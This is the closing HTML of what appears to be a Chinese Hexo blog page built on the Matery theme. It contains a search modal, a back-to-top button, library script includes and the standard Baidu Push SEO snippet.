    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script src="/js/search.js"></script>
<script type="text/javascript">
$(function () {
    searchFunc("/search.xml", 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    

    

    

    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
